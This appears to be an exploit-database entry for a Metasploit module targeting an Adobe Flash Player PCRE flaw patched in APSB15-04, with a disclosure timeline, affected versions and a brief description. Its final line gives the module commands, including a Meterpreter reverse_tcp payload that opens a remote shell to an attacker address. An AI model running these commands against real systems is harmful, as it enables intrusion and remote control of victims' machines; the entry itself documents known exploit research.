Timeline :
Vulnerability discovered and reported to the vendor by Mark Brand and Natalie Silvanovich of Google Project Zero the 2014-11-25
Patched by the vendor through APSB15-04 the 2015-02-05
Details of the vulnerability provided by Google Project Zero the 2015-02-12
PoC provided by :
Mark Brand
sinn3r
Reference(s) :
Affected version(s) :
Adobe Flash Player 16.0.0.296 and earlier versions
Tested onĀ :
Windows 7 SP1 with Internet Explorer 8 and Adobe Flash Player 16.0.0.235
Description :
This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error in the PCRE engine, specifically in the handling of the \c escape sequence when followed by a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.
Commands :
use exploit/windows/browser/adobe_flash_pcre set SRVHOST 192.168.6.138 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.6.138 run getuid